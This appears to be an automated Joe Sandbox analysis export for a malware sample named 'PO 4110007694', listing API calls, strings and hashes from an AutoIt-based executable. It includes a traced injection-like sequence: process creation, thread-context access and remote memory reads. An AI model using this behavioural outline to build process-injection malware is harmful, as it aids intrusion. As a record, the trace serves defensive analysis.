                                                                    • Instruction Fuzzy Hash: 0DB20374608741DFD724DF24C894BAEB7E0BF85304F24491EF899872A1CB71E989DB86

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00C78F5F: __time64.LIBCMT ref: 00C78F69
                                                                      • Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD
                                                                    • __wsplitpath.LIBCMT ref: 00C79234
                                                                      • Part of subcall function 00C340FB: __wsplitpath_helper.LIBCMT ref: 00C3413B
                                                                    • _wcscpy.LIBCMT ref: 00C79247
                                                                    • _wcscat.LIBCMT ref: 00C7925A
                                                                    • __wsplitpath.LIBCMT ref: 00C7927F
                                                                    • _wcscat.LIBCMT ref: 00C79295
                                                                    • _wcscat.LIBCMT ref: 00C792A8
                                                                      • Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FDE
                                                                      • Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FED
                                                                    • _wcscmp.LIBCMT ref: 00C791EF
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C79452
                                                                    • _wcsncpy.LIBCMT ref: 00C794C5
                                                                    • DeleteFileW.KERNEL32(?,?), ref: 00C794FB
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C79511
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79522
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79534
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 1500180987-0
                                                                    • Opcode ID: 4c00a33f5ee1f415b609efb362e31805663f2fe15c1d7de84e302c8eb1517efd
                                                                    • Instruction ID: e25e9c67e9a14cbbb04740d6b88968984e16f8493228c298679b4036873b35c3
                                                                    • Opcode Fuzzy Hash: 4c00a33f5ee1f415b609efb362e31805663f2fe15c1d7de84e302c8eb1517efd
                                                                    • Instruction Fuzzy Hash: 66C15CB1D00229AADF25DF95CC85EDEB7BDEF45310F0080AAF609E7151EB309A859F61

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
                                                                    • Instruction ID: 71672453e8d2f570e82b2d8c87a74e2d33695a88dfb93dcbb8109e8529ad4b4c
                                                                    • Opcode Fuzzy Hash: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
                                                                    • Instruction Fuzzy Hash: 403105B1941219AFDB409FA4EC89BDDBBF4FB09310F10412EE580E62A0D7B5459ACF90

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
                                                                    • Instruction ID: f2731a3f60fdee52de31ae444f69b32aac15812c3477bb8e2a666026a00e40d4
                                                                    • Opcode Fuzzy Hash: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
                                                                    • Instruction Fuzzy Hash: E921C0B1942618AFDB00DFA8EC89BDDBBF8FB08701F10412BFA10E62A0D7B145559F91

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00C14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CD52F8,?,00C137AE,?), ref: 00C14724
                                                                      • Part of subcall function 00C3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C17165), ref: 00C3052D
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C171A8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C4E8C8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C4E909
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00C4E947
                                                                    • _wcscat.LIBCMT ref: 00C4E9A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 2673923337-2727554177
                                                                    • Opcode ID: b8454103511494eedb2cc7e086708d0ba04e2c1ccb1a52796843a5d3978d35aa
                                                                    • Instruction ID: 46ce5c5417486c0b868a2466d8359699cfe9ada9f2fd1a52065faabac32df4b3
                                                                    • Opcode Fuzzy Hash: b8454103511494eedb2cc7e086708d0ba04e2c1ccb1a52796843a5d3978d35aa
                                                                    • Instruction Fuzzy Hash: 1C716C715093019EC700EF65E881AAFBBF8FF95310F40092EF445C71A1EB719949DB92

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C13A50
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
                                                                    • LoadIconW.USER32(00000063), ref: 00C13A76
                                                                    • LoadIconW.USER32(000000A4), ref: 00C13A88
                                                                    • LoadIconW.USER32(000000A2), ref: 00C13A9A
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
                                                                    • RegisterClassExW.USER32(?), ref: 00C13B16
                                                                      • Part of subcall function 00C13041: GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                      • Part of subcall function 00C13041: RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                      • Part of subcall function 00C13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                      • Part of subcall function 00C13041: InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                      • Part of subcall function 00C13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                      • Part of subcall function 00C13041: LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                      • Part of subcall function 00C13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
                                                                    • Instruction ID: cfe1d9f90afb732822162ea30104adfbaf16c267a76ce14597b0ebecb4fac47a
                                                                    • Opcode Fuzzy Hash: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
                                                                    • Instruction Fuzzy Hash: 10213770902308AFEB10DFA4EC09BAD7BB0FB08716F10012BF504EA2A1D7B556589F84

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00C136D2
                                                                    • KillTimer.USER32(?,00000001), ref: 00C136FC
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C1371F
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C1372A
                                                                    • CreatePopupMenu.USER32 ref: 00C1373E
                                                                    • PostQuitMessage.USER32(00000000), ref: 00C1374D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
                                                                    • Instruction ID: 9fd7d11072b318a199fe3af3c4d7e7c87f1e0fe6f5becf4374f145c4eac292e8
                                                                    • Opcode Fuzzy Hash: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
                                                                    • Instruction Fuzzy Hash: EE4104F1200585FBDB24AF64ED09BFD3B55FB07305F14012AFA12D62E1DA609B85B6A1

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                    • API String ID: 1825951767-3513169116
                                                                    • Opcode ID: c861d91dc66cf723466d11992874c131f20c619c773641e2284ad5212562391a
                                                                    • Instruction ID: 24def29bb09bb11c19d302b395ce5e5fbd7f4bdb3d042682cb89d885fa4d9e87
                                                                    • Opcode Fuzzy Hash: c861d91dc66cf723466d11992874c131f20c619c773641e2284ad5212562391a
                                                                    • Instruction Fuzzy Hash: B8A1A07190021D9ACF05EBA0DC95EEEB778FF16314F00002AF416B7191EF709A89EBA0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017E1391
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017E15B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction ID: 6a7cfc7ea8421202b9e066fdd03c55641c08cb6117e8e3cef824a2badb821996
                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction Fuzzy Hash: 52A11770E00209EBDB14CFA8C899BEEFBF5BF48304F608599E611BB281D7759A41CB55

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00C13A38
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00C13A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
                                                                    • Instruction ID: f4b54e44a04e13fd4bf8279e5924b6fe6ea2e8a32c3672ced0067db3d0bef0e8
                                                                    • Opcode Fuzzy Hash: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
                                                                    • Instruction Fuzzy Hash: 22F03474602290BEEA305B23AC8CF6F3F7DE7C6F50B02002FB900E21B0C6610806DAB0

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 017E0F90: Sleep.KERNELBASE(000001F4), ref: 017E0FA1
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017E11AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: 360TWDO5CADAKKV2H
                                                                    • API String ID: 2694422964-2548096442
                                                                    • Opcode ID: 837b2f742147e53ab4ecd8526af411a52eccc3931252b0d63b5a9f6570e1b4b6
                                                                    • Instruction ID: f8ce10c4f7ed21076387fcff16b7297e34b50faf58af8358e379b61f42571302
                                                                    • Opcode Fuzzy Hash: 837b2f742147e53ab4ecd8526af411a52eccc3931252b0d63b5a9f6570e1b4b6
                                                                    • Instruction Fuzzy Hash: 6F517571D04249DAEF11DBA4C819BEEBBB8AF19300F004599E609BB2C0D7795B45CB65

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C4D3D7
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • _memset.LIBCMT ref: 00C140FC
                                                                    • _wcscpy.LIBCMT ref: 00C14150
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 3942752672-1585850449
                                                                    • Opcode ID: 89184a2d2def29bb5f33157adac5684aa37ab78bda2247a045624438cf165970
                                                                    • Instruction ID: 92ce8a973995198470077802af5430e7f7b7876de9a97ba8a9b28464ddd69299
                                                                    • Opcode Fuzzy Hash: 89184a2d2def29bb5f33157adac5684aa37ab78bda2247a045624438cf165970
                                                                    • Instruction Fuzzy Hash: 8A31D171008304AFD724EB60DC46FDF77E8AF46300F104A1FF685921A1EB70A689E782

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1133 c1686a-c16891 call c14ddd 1136 c4e031-c4e041 call c7955b 1133->1136 1137 c16897-c168a5 call c14ddd 1133->1137 1141 c4e046-c4e048 1136->1141 1137->1136 1142 c168ab-c168b1 1137->1142 1143 c4e067-c4e0af call c30db6 1141->1143 1144 c4e04a-c4e04d call c14e4a 1141->1144 1146 c4e052-c4e061 call c742f8 1142->1146 1147 c168b7-c168d9 call c16a8c 1142->1147 1152 c4e0d4 1143->1152 1153 c4e0b1-c4e0bb 1143->1153 1144->1146 1146->1143 1157 c4e0d6-c4e0e9 1152->1157 1156 c4e0cf-c4e0d0 1153->1156 1158 c4e0d2 1156->1158 1159 c4e0bd-c4e0cc 1156->1159 1160 c4e260-c4e263 call c32d55 1157->1160 1161 c4e0ef 1157->1161 1158->1157 1159->1156 1164 c4e268-c4e271 call c14e4a 1160->1164 1163 c4e0f6-c4e0f9 call c17480 1161->1163 1167 c4e0fe-c4e120 call c15db2 call c773e9 1163->1167 1170 c4e273-c4e283 call c17616 call c15d9b 1164->1170 1176 c4e134-c4e13e call c773d3 1167->1176 1177 c4e122-c4e12f 1167->1177 1187 c4e288-c4e2b8 call c6f7a1 call c30e2c call c32d55 call c14e4a 1170->1187 1185 c4e140-c4e153 1176->1185 1186 c4e158-c4e162 call c773bd 1176->1186 1179 c4e227-c4e237 call c1750f 1177->1179 1179->1167 1189 c4e23d-c4e25a call c1735d 1179->1189 1185->1179 1196 c4e164-c4e171 1186->1196 1197 c4e176-c4e180 call c15e2a 1186->1197 1187->1170 1189->1160 1189->1163 1196->1179 1197->1179 1203 c4e186-c4e19e call c6f73d 1197->1203 1208 c4e1a0-c4e1bf call c17de1 call c15904 1203->1208 1209 c4e1c1-c4e1c4 1203->1209 1232 c4e1e2-c4e1f0 call c15db2 1208->1232 1211 c4e1c6-c4e1e1 call c17de1 call c16839 call c15904 1209->1211 1212 c4e1f2-c4e1f5 1209->1212 1211->1232 1214 c4e215-c4e218 call c7737f 1212->1214 1215 c4e1f7-c4e200 call c6f65e 1212->1215 1222 c4e21d-c4e226 call c30e2c 1214->1222 1215->1187 1225 c4e206-c4e210 call c30e2c 1215->1225 1222->1179 1225->1167 1232->1222
                                                                    APIs
                                                                      • Part of subcall function 00C14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F
                                                                    • _free.LIBCMT ref: 00C4E263
                                                                    • _free.LIBCMT ref: 00C4E2AA
                                                                      • Part of subcall function 00C16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 2861923089-1757145024
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C135A1,SwapMouseButtons,00000004,?), ref: 00C135D4
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C135F5
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C13617
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 017E074B
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017E07E1
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017E0803
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    APIs
                                                                      • Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837
                                                                    • _free.LIBCMT ref: 00C796A2
                                                                    • _free.LIBCMT ref: 00C796A9
                                                                    • _free.LIBCMT ref: 00C79714
                                                                      • Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
                                                                      • Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B
                                                                    • _free.LIBCMT ref: 00C7971C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C4EA39
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00C4EA83
